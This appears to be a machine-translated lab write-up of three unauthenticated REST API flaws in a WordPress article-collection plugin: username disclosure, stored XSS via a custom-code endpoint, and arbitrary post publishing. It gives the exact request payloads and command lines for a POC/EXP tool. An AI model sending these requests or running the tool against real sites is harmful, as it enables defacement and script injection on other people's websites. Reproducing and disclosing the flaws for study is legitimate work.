This vulnerability is WordPress An article collection plug-in ： Bee collection , There are no related to the implementation of plug-in functions API Do Authentication ; Causes requests sent by anyone to be executed .

Download vulnerability replication environment ：https://pan.baidu.com/s/1Oh_FX12UGpqrH0_ydoBNUA Extraction code : wwi7

part POC and EXP：https://github.com/NonAbsolute/MiFengBaiBaoXiangPluginPOCAndEXP

Download the environment and unzip it “WordPress Plug in bee collection reproduction environment .zip”
basis README.md Set up the environment , No more retelling

Loophole I

WordPress User name exposure
The collection page of the plug-in is shown in the following figure ：
Not to acquire page information API Make restrictions , Cause the attacker to gain WordPress User name and other information


Let's open the check element and refresh the page to see POST request

Then copy the request URL With request content to test tool

URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/crawler
Content-Type: application/json
{"action":"get_config","target":"crawler"}

You can see , Get information without authentication

Loophole two

XSS attack
In the plug-in's “ Custom code ” Add page , Also unauthenticated ; Easy to check 、 Add custom code .


Let's use the test tool to send a request to see

# View custom code 
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{"action":"fetch"}

Get the content of the custom code （ Because no custom code was added , So it's empty ）

# Add custom code 
URL: http://192.168.8.6:8080/wp-json/wp-beebox/v1/code
Content-Type: application/json
{
    "action": "save",
    "data": [
        {
            "title": "testCode",
            "content": "<script>alert(\" I'm dengwenyi , I am in Shenzhen, Guangdong ！\")</script>\n<h1> I'm dengwenyi , I am in Shenzhen, Guangdong ！</h1>",
            "status": "on",
            "position": "head"
        }
    ]
}

You can see , Successfully added custom code , And the page also has a response




Indicate the ：“ I like that very much ; I want to write it in the text ; Don't be surprised ; harmless .”

Loophole three

Any article published
This reappearance depends on the “ part POC and EXP” The download link of .
See the specific implementation process Golang Code , and Github Warehouse README.md

We only download the executable file compiled by the author ; Just use it .
Download executable ：

Create a folder , Put the executable in ; Because it will generate logs in the execution directory

-h See how to use

Here I'll give you a brief explanation ：

--IP  you Kali Of IP
--Port  you Kali The port of , arbitrarily ; As long as it is not occupied 
--Type  The value is 'POC' perhaps 'EXP', Default POC

--PayloadForTitle And --PayloadForMain 
 Just fill in one of the two , It is OK to fill in all ; This is a --Type by EXP In case of Payload.PayloadForTitle For the title of the post ;PayloadForMain To publish the content of the article .--Type by POC This item may not be filled in if .Payload Support file path .

--PageType  Article publishing type , yes WordPress Your article is still a page ; Default 'Article' article ; You can also fill in the page 'Page'.

--ET  Infiltrate the target , If you don't fill in , Is interactive mode ; Fill in the automatic mode ; Only file paths are supported . The objects in the document are marked with ',' Separate ; Such as ：
192.168.0.1,192.168.0.2,192.168.0.3

Let's use interactive mode to test whether the vulnerability exists ：

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 

Go into interactive mode , Enter... At the prompt -h help
Here I will briefly explain ：

 --ET  Infiltrate the target , The goal is to ',' Separate ; Such as ：
192.168.0.1,192.168.0.2,192.168.0.3

Close  Exit interactive mode 

Loopholes found , Here's the picture ：

-ET 192.168.8.6:8080

Let's end POC, add to EXP Parameters enter EXP Test it ：

./POCAndEXP-ForDarwin -IP 192.168.8.1 -Port 8080 -Type EXP -PayloadForTitle  I'm dengwenyi , I am in Shenzhen, Guangdong  --PayloadForMain  I'm dengwenyi , I am in Shenzhen, Guangdong 

It is found that the penetration has been successful ：

see WordPress I did add an article ：


sign out EXP, We see that many log files are generated in the current directory , It records the penetration ：

Suggestions for bug fixing

Temporarily disable the plug-in , Can avoid being affected by this vulnerability .

Be careful ️, This test is conducted in a safe environment ; All code is limited to running in a replication environment , Do not maliciously tamper with the code and run the code outside the test environment ; Otherwise, we will be responsible for the consequences ！